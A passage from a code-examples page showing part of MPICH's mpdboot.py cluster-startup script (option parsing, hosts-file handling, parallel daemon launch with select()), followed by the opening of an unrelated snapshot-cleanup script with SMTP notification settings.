        elif argv[argidx].startswith('--ncpus'):
            splitArg = argv[argidx].split('=')
            try:
                myNcpus = int(splitArg[1])
            except:
                print 'mpdboot: invalid argument:', argv[argidx]
                usage()
            argidx += 1
        elif argv[argidx].startswith('--ifhn'):
            splitArg = argv[argidx].split('=')
            myIfhn = splitArg[1]
            myHost = splitArg[1]
            argidx += 1
        elif argv[argidx] == '-n':  # or --totalnum=
            totalnumToStart = int(argv[argidx + 1])
            argidx += 2
        elif argv[argidx].startswith('--totalnum'):
            splitArg = argv[argidx].split('=')
            try:
                totalnumToStart = int(splitArg[1])
            except:
                print 'mpdboot: invalid argument:', argv[argidx]
                usage()
            argidx += 1
        elif argv[argidx].startswith('--maxbranch'):
            splitArg = argv[argidx].split('=')
            try:
                maxUnderOneRoot = int(splitArg[1])
            except:
                print 'mpdboot: invalid argument:', argv[argidx]
                usage()
            argidx += 1
        elif argv[argidx] == '-d' or argv[argidx] == '--debug':
            debug = 1
            argidx += 1
        elif argv[argidx] == '-s' or argv[argidx] == '--shell':
            shell = 'bourne'
            argidx += 1
        elif argv[argidx] == '-v' or argv[argidx] == '--verbose':
            verbose = 1
            argidx += 1
        elif argv[argidx] == '-c' or argv[argidx] == '--chkup':
            chkupIndicator = 1
            argidx += 1
        elif argv[argidx] == '--chkuponly':
            chkupIndicator = 2
            argidx += 1
        elif argv[argidx] == '-1':
            oneMPDPerHost = 0
            argidx += 1
        elif argv[argidx] == '--loccons':
            localConArg = '-n'
            argidx += 1
        elif argv[argidx] == '--remcons':
            remoteConArg = '-n'
            argidx += 1
        else:
            print 'mpdboot: unrecognized argument:', argv[argidx]
            usage()
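
    # For example, both of the following forms are accepted by the parser
    # above (equivalent short and long options):
    #     mpdboot -n 8 -f mpd.hosts
    #     mpdboot --totalnum=8 --file=mpd.hosts --maxbranch=4 --verbose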

    # Fix for tt#662, make sure the config file is available to avoid some very
    # confusing error messages.  We don't actually need these values here.
    parmdb = MPDParmDB()
    parmdb.get_parms_from_rcfile(parmsToOverride={}, errIfMissingFile=1)

    if debug:
        print 'debug: starting'

    lines = []
    if totalnumToStart > 1:
        try:
            f = open(hostsFilename, 'r')
            for line in f:
                lines.append(line)
        except:
            print 'unable to open (or read) hostsfile %s' % (hostsFilename)
            exit(-1)
    hostsAndInfo = [{'host': myHost, 'ncpus': myNcpus, 'ifhn': myIfhn}]
    for line in lines:
        line = line.strip()
        if not line or line[0] == '#':
            continue
        splitLine = re.split(r'\s+', line)
        host = splitLine[0]
        ncpus = 1  # default
        if ':' in host:
            (host, ncpus) = host.split(':', 1)
            ncpus = int(ncpus)
        ifhn = ''  # default
        for kv in splitLine[1:]:
            (k, v) = kv.split('=', 1)
            if k == 'ifhn':
                ifhn = v
        hostsAndInfo.append({'host': host, 'ncpus': ncpus, 'ifhn': ifhn})
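    # For reference, the loop above parses hosts-file lines of these forms
    # (hostnames are placeholders):
    #     node1                  bare hostname, ncpus defaults to 1
    #     node2:4                host:ncpus
    #     node3:2 ifhn=10.0.0.3  host:ncpus plus an interface hostname
    # Blank lines and lines starting with '#' are skipped.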
    cachedIPs = {}
    if oneMPDPerHost and totalnumToStart > 1:
        oldHostsAndInfo = hostsAndInfo[:]
        hostsAndInfo = []
        for hostAndInfo in oldHostsAndInfo:
            oldhost = hostAndInfo['host']
            try:
                ips = gethostbyname_ex(oldhost)[2]  # may fail if invalid host
            except:
                print 'unable to obtain IP for host:', oldhost
                continue
            uips = {}  # unique ips
            for ip in ips:
                uips[ip] = 1
            keep = 1
            for ip in uips.keys():
                if cachedIPs.has_key(ip):
                    keep = 0
                    break
            if keep:
                hostsAndInfo.append(hostAndInfo)
                cachedIPs.update(uips)
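    # Net effect of the block above: with oneMPDPerHost set, a host whose
    # IPs have all been seen already is dropped, so each physical machine
    # gets at most one mpd even when it appears under several names.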
    if len(hostsAndInfo) < totalnumToStart:  # one is local
        print 'totalnum=%d  numhosts=%d' % (totalnumToStart, len(hostsAndInfo))
        print 'there are not enough hosts on which to start all processes'
        exit(-1)
    if chkupIndicator:
        hostsToCheck = [hai['host'] for hai in hostsAndInfo[1:totalnumToStart]]
        (upList, dnList) = chkupdn(hostsToCheck)
        if dnList:
            print "these hosts are down; exiting"
            print dnList
            exit(-1)
        print "there are %d hosts up (counting local)" % (len(upList) + 1)
        if chkupIndicator == 2:  # do the chkup and quit
            exit(0)

    try:
        # stop current (if any) mpds; ignore the output
        getoutput('%s/mpdallexit.py' % (fullDirName))
        if verbose or debug:
            print 'running mpdallexit on %s' % (myHost)
    except:
        pass

    if environ.has_key('MPD_TMPDIR'):
        tmpdir = environ['MPD_TMPDIR']
    else:
        tmpdir = ''
    if myIfhn:
        ifhn = '--ifhn=%s' % (myIfhn)
    else:
        ifhn = ''
    hostsAndInfo[0]['entry_host'] = ''
    hostsAndInfo[0]['entry_port'] = ''
    mpdArgs = '%s %s --ncpus=%d' % (localConArg, ifhn, myNcpus)
    if tmpdir:
        mpdArgs += ' --tmpdir=%s' % (tmpdir)
    (mpdPID, mpdFD) = launch_one_mpd(0, 0, mpdArgs, hostsAndInfo)
    fd2idx = {mpdFD: 0}

    handle_mpd_output(mpdFD, fd2idx, hostsAndInfo)

    try:
        from os import sysconf
        maxfds = sysconf('SC_OPEN_MAX')
    except:
        maxfds = 1024
    maxAtOnce = min(128, maxfds - 8)  # -8 for stdout, etc., plus a few more for padding

    hostsSeen = {myHost: 1}
    fdsToSelect = []
    numStarted = 1  # local already going
    numStarting = 0
    numUnderCurrRoot = 0
    possRoots = []
    currRoot = 0
    idxToStart = 1  # local mpd already going
    while numStarted < totalnumToStart:
        if numStarting < maxAtOnce and idxToStart < totalnumToStart:
            if numUnderCurrRoot < maxUnderOneRoot:
                entryHost = hostsAndInfo[currRoot]['host']
                entryPort = hostsAndInfo[currRoot]['list_port']
                hostsAndInfo[idxToStart]['entry_host'] = entryHost
                hostsAndInfo[idxToStart]['entry_port'] = entryPort
                if hostsSeen.has_key(hostsAndInfo[idxToStart]['host']):
                    remoteConArg = '-n'
                myNcpus = hostsAndInfo[idxToStart]['ncpus']
                ifhn = hostsAndInfo[idxToStart]['ifhn']
                if ifhn:
                    ifhn = '--ifhn=%s' % (ifhn)
                mpdArgs = '%s -h %s -p %s %s --ncpus=%d' % (
                    remoteConArg, entryHost, entryPort, ifhn, myNcpus)
                if tmpdir:
                    mpdArgs += ' --tmpdir=%s' % (tmpdir)
                (mpdPID, mpdFD) = launch_one_mpd(idxToStart, currRoot, mpdArgs,
                                                 hostsAndInfo)
                numStarting += 1
                numUnderCurrRoot += 1
                hostsAndInfo[idxToStart]['pid'] = mpdPID
                hostsSeen[hostsAndInfo[idxToStart]['host']] = 1
                fd2idx[mpdFD] = idxToStart
                fdsToSelect.append(mpdFD)
                idxToStart += 1
            else:
                if possRoots:
                    currRoot = possRoots.pop()
                    numUnderCurrRoot = 0
            selectTime = 0.01
        else:
            selectTime = 0.1
        try:
            (readyFDs, unused1, unused2) = select(fdsToSelect, [], [],
                                                  selectTime)
        except error, errmsg:
            mpd_print(1, 'mpdboot: select failed: errmsg=:%s:' % (errmsg))
            exit(-1)
        for fd in readyFDs:
            handle_mpd_output(fd, fd2idx, hostsAndInfo)
            numStarted += 1
            numStarting -= 1
            possRoots.append(fd2idx[fd])
            fdsToSelect.remove(fd)
            fd.close()
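
A minimal, self-contained sketch of the startup pattern used above: keep at
most a fixed number of children outstanding and use select() to harvest
whichever ones report back first. The command and names here (echo,
boot_all) are placeholders, not mpdboot's actual launcher.

import subprocess
from select import select

def boot_all(hosts, max_at_once=4):
    pending = list(hosts)
    running = {}  # stdout file -> Popen, analogous to fd2idx above
    while pending or running:
        # launch more children, but never more than max_at_once at a time
        while pending and len(running) < max_at_once:
            host = pending.pop(0)
            p = subprocess.Popen(['echo', host],  # placeholder launcher
                                 stdout=subprocess.PIPE)
            running[p.stdout] = p
        # brief timeout, as with selectTime above, so launching is not starved
        (ready, unused1, unused2) = select(list(running.keys()), [], [], 0.1)
        for fd in ready:
            fd.read()                  # consume the child's report
            running.pop(fd).wait()
            fd.close()

The short select() timeout mirrors selectTime above: the loop alternates
between launching new children and reaping finished ones instead of blocking
on either side.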
Exemple #60
0
# 12 4 * * 7 python /path/to/snap_delete.py
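# (i.e. a crontab entry: minute 12, hour 4, day-of-week 7 -> every Sunday at 04:12)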

import subprocess
import json
import datetime
import smtplib
import socket
try:
    from email.mime.text import MIMEText
except ImportError:
    # Python 2.4 (CentOS 5.x)
    from email.MIMEText import MIMEText

# Change this to some value if you don't want your server hostname to show in
# the notification emails
THIS_SERVER = socket.gethostname()

# Server hostname or IP address
SMTP_SERVER = 'yourdomain.com.mail.protection.outlook.com'
SMTP_PORT = 25

# Set to True if you need SMTP over SSL
SMTP_SSL = False

# Set to True if you need to authenticate to your SMTP server
SMTP_AUTH = False
# Fill in authorization information here if True above
SMTP_USERNAME = '******'
SMTP_PASSWORD = ''
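
# A hedged sketch (hypothetical helper, not part of the original script) of
# how the settings above would typically drive smtplib; smtplib.SMTP_SSL
# needs Python 2.6+:
def _send_mail(sender, recipients, subject, body):
    msg = MIMEText(body)
    msg['Subject'] = subject
    msg['From'] = sender
    msg['To'] = ', '.join(recipients)
    if SMTP_SSL:
        server = smtplib.SMTP_SSL(SMTP_SERVER, SMTP_PORT)
    else:
        server = smtplib.SMTP(SMTP_SERVER, SMTP_PORT)
    if SMTP_AUTH:
        server.login(SMTP_USERNAME, SMTP_PASSWORD)
    server.sendmail(sender, recipients, msg.as_string())
    server.quit()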

# Takes a single sender